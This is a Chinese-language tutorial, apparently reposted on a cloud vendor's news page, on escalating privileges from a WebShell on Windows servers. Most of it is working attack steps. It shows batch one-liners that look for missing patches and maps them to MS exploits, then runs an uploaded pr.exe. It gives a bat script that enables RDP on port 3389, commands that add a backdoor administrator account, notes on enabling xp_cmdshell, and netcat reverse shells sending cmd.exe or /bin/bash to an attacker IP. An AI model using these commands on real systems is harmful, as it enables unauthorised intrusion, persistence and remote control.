溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

基于WebShell的權(quán)限提升

發(fā)布時間:2021-12-10 09:36:22 來源:億速云 閱讀:205 作者:柒染 欄目:大數(shù)據(jù)

今天就跟大家聊聊有關(guān)基于WebShell的權(quán)限提升,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

一、基于WebShell的提權(quán)

1、訪問大馬,查看權(quán)限

http://192.168.1.147/dm.asp

基于WebShell的權(quán)限提升

2、若果遇到拒絕訪問什么可以上傳一個aspx的大馬,這個權(quán)限比較大

http://192.168.1.147/da.aspx

基于WebShell的權(quán)限提升

二、window提權(quán)

1、查看系統(tǒng)打補(bǔ)丁情況

win2003:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt

基于WebShell的權(quán)限提升

通用型:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt

2、補(bǔ)丁對照表,上傳exe,執(zhí)行命令

KB952004 :MS09-012 PR

KB956572 :MS09-012 巴西烤肉

KB2393802:MS11-011

KB2592799:MS11-080

KB2621440:MS12-0203

KB2160329:MS10-048

KB970483 :MS09-020  iis6提權(quán)(可能是)

KB2124261,KB2271195 MS10-065 IIS7提權(quán)(可能是)

KB977165 :MS10-015

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB3077657 MS15_077 字體提權(quán)

KB944653 MS07-067

KB952004 MS09-012

KB971657 MS09-041

KB2620712 MS11-097

kb942831 MS08-005

KB2503665 MS11-046

KB2592799 MS11-080

3、由于存在PR提權(quán)漏洞,所以上傳一個pr.exe執(zhí)行

基于WebShell的權(quán)限提升

4、一般那些目錄有讀寫權(quán)限

日志,緩存、回收站、大馬所在目錄

5、開啟3389,命令行

新建一個bat文件,里面輸入以下內(nèi)容,上傳到相應(yīng)目錄

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

命令行執(zhí)行

/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"

基于WebShell的權(quán)限提升

2、用工具開3389端口

基于WebShell的權(quán)限提升

基于WebShell的權(quán)限提升

3、創(chuàng)建用戶并添加管理員組

net user abc 123 /add

net localgroup administrators abc /add

三、數(shù)據(jù)庫提權(quán)

基于WebShell的權(quán)限提升

XP_CMDSHELL開啟方法,新建查詢

基于WebShell的權(quán)限提升

基于WebShell的權(quán)限提升

四、反彈shell

1、正向連接,主動連接服務(wù)器,服務(wù)器開啟相應(yīng)端口

2、反向連接,服務(wù)器主動連接我們,我們監(jiān)聽某一端口

小攻:nc -lvvp 1234

小受(webshell):nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234

3、獲取權(quán)限

基于WebShell的權(quán)限提升

4、linux系統(tǒng)nc -e /bin/bash 小攻ip 1234

看完上述內(nèi)容,你們對基于WebShell的權(quán)限提升有進(jìn)一步的了解嗎?如果還想了解更多知識或者相關(guān)內(nèi)容,請關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI